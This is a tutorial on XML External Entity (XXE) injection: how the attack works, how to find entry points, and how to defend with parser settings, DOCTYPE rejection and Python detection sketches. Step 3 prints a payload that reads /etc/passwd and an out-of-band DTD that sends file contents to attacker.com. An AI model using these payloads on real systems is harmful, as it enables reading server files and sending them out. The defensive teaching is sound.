XXE (XML External Entity Injection) Vulnerability and Protection

Description
XXE (XML External Entity Injection) is a security vulnerability targeting XML processors. By supplying crafted XML that declares external entities, an attacker can read files on the server, make the server send requests to internal systems (SSRF), or, in some environments, execute code remotely. Many applications (such as APIs and document parsers) use XML for data transmission, so any of them whose parser resolves external entities is exposed to XXE attacks.

Key Points

Basic XML Structure: XML documents can define entities (similar to variables), e.g., <!ENTITY name "value">.
External Entities: Use the SYSTEM keyword to reference external resources, e.g., <!ENTITY ext SYSTEM "file:///etc/passwd">.
Attack Principle: If the parser allows loading external entities, attackers can inject malicious entities to steal data or probe internal networks.

Step-by-Step Explanation of the Process

Step 1: Understanding How XML External Entities Work

Normal XML documents may contain predefined entities (e.g., &lt; for <), but external entities allow loading data from files, URLs, etc.
Example: The following XML declares an external entity and references it:
```
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<user>&file;</user>
```
If the parser does not disable external entities, &file; will be replaced with the file content.
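
To make the declaration step concrete, here is a minimal Python sketch that lists the external entities a document declares, using the standard library's xml.parsers.expat. The function name list_external_entities is an illustrative assumption. No external entity handler is installed, so the referenced file is never opened; the sketch only reports what a permissive parser would have been asked to load.

```python
from xml.parsers import expat


def list_external_entities(xml_bytes: bytes) -> list[tuple[str, str]]:
    """Return (entity name, system identifier) pairs declared in the DTD."""
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # External entities carry a system identifier instead of a literal value.
        if system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is set, so nothing is fetched.
    parser.Parse(xml_bytes, True)
    return found


DOCUMENT = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<user>&file;</user>"""

print(list_external_entities(DOCUMENT))
```

The system identifier is exactly the resource a parser with external entities enabled would try to read and substitute for &file;.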

Step 2: Identifying XXE Attack Scenarios

Common Entry Points:
- Functions accepting XML input (e.g., API requests, file uploads, SOAP services).
- Parameters may be hidden in the Body or Header of HTTP requests.
Attack Types:
- File reading: Use the file:// protocol to read system files.
- SSRF attacks: Exploit the http:// protocol to access internal services.
- Blind XXE: Validate vulnerability existence via errors or Out-of-Band (OOB) data exfiltration.
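
When looking for entry points, one rough first pass is to flag requests whose Content-Type indicates XML. The sketch below is a heuristic under stated assumptions: the name accepts_xml and the set of media types are illustrative, and some endpoints parse XML regardless of the declared type, so a negative result does not prove an endpoint is safe.

```python
# Media types that commonly indicate an XML request body (illustrative list).
XML_MEDIA_TYPES = {"application/xml", "text/xml", "application/soap+xml"}


def accepts_xml(content_type: str) -> bool:
    """Return True if a Content-Type header value suggests an XML body."""
    # Drop parameters such as "; charset=utf-8" and normalise case.
    media_type = content_type.split(";", 1)[0].strip().lower()
    # Structured-syntax suffixes such as image/svg+xml are XML as well.
    return media_type in XML_MEDIA_TYPES or media_type.endswith("+xml")


for header in ("application/soap+xml; charset=utf-8", "image/svg+xml", "application/json"):
    print(header, "->", accepts_xml(header))
```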

Step 3: Manually Constructing XXE Attack Payloads

Basic attack (file reading):

```
<?xml version="1.0"?>
<!-- Injected into XML input -->
<!DOCTYPE attack [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
```

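Blind scenario (no echo):

Use parameter entities and an external DTD to trigger OOB data exfiltration. The submitted document loads the attacker's DTD through a parameter entity; the DTD reads the target file into %payload; and defines a second entity whose URL embeds that content. The final %send; reference is what makes the parser issue the request:

```
<!-- Attacker-controlled DTD file (http://attacker.com/malicious.dtd) -->
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % oob "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%payload;'>">
%oob;
%send;
```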

Step 4: Implementation Principles of Protective Measures

Disable External Entities:
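- Explicitly configure the parser to refuse external entities. In PHP before 8.0 this is libxml_disable_entity_loader(true); the function is deprecated as of PHP 8.0 because libxml2 2.9.0 and later no longer load external entities by default.
- In Java, set FEATURE_SECURE_PROCESSING on the SAXParser or DocumentBuilder factory, but do not rely on it alone, since it may not block every XXE vector. Also set the http://apache.org/xml/features/disallow-doctype-decl feature to true, or disable the external-general-entities and external-parameter-entities features.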
Use Whitelist Validation:
- Only allow expected XML structures; reject input that contains <!DOCTYPE or <!ENTITY declarations rather than trying to strip them out.
Convert Data Format:
- Replace XML with alternatives like JSON (e.g., for REST APIs).
Static Code Scanning:
- Check if the XML parser configuration in the code is secure.
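
As one way to apply the "disable external entities" and "reject DOCTYPE" measures in Python, the following minimal sketch refuses any document that carries a DOCTYPE declaration before building a tree. It uses only the standard library; the names ForbiddenDTDError and parse_untrusted_xml are assumptions made for illustration, and the two-pass design trades some speed for simplicity. Third-party packages such as defusedxml implement a comparable policy.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenDTDError(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise ForbiddenDTDError(f"DOCTYPE declaration not allowed: {name!r}")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing any DTD."""
    # First pass: scan only. A DOCTYPE aborts parsing before any
    # entity declaration inside it is processed.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)
    # Second pass: build the tree from input known to carry no DTD.
    return ET.fromstring(data)


MALICIOUS = b"""<?xml version="1.0"?>
<!DOCTYPE attack [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""

try:
    parse_untrusted_xml(MALICIOUS)
except ForbiddenDTDError as exc:
    print("rejected:", exc)
```

Rejecting the whole document is stricter than disabling entity resolution alone, but it also rules out entity-expansion tricks that need a DTD, and most data-exchange formats do not require one.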

Step 5: In-Depth Protection in Practice

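Update dependencies: newer parser releases often ship safer defaults (e.g., libxml2 2.9.0 and later no longer load external entities by default). Do not assume safe defaults, though; verify the configuration of every parser in use, Apache Xerces included.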
Network-layer restrictions: Prohibit outbound requests from the server hosting the parser to reduce SSRF risks.
Log monitoring: Abnormal XML requests should trigger alerts.
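
The log-monitoring idea can be sketched as a small check that runs on incoming request bodies and logs a warning when DTD markers appear. This is a heuristic under stated assumptions: the logger name xxe_monitor, the function flag_suspicious_xml, and the pattern are illustrative, and a body in an encoding such as UTF-16 would slip past this byte-level match.

```python
import logging
import re

logger = logging.getLogger("xxe_monitor")

# DTD markers that rarely appear in legitimate data-exchange payloads.
SUSPICIOUS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def flag_suspicious_xml(body: bytes, source: str = "unknown") -> bool:
    """Log a warning and return True if the body contains DTD markers."""
    match = SUSPICIOUS.search(body)
    if match is None:
        return False
    keyword = match.group(1).decode("ascii").upper()
    logger.warning("possible XXE attempt from %s: %s declaration found",
                   source, keyword)
    return True


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    flag_suspicious_xml(b'<!DOCTYPE a [<!ENTITY x SYSTEM "file:///etc/passwd">]><a>&x;</a>',
                        source="203.0.113.7")
```

A check like this supplements parser hardening and does not replace it; its value is in surfacing probing activity early.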

The steps above cover the vulnerability principles, exploitation methods, and protection strategies for XXE. In actual development, require that external entities be disabled from the design phase onward, and combine this with code auditing tools to identify remaining risks.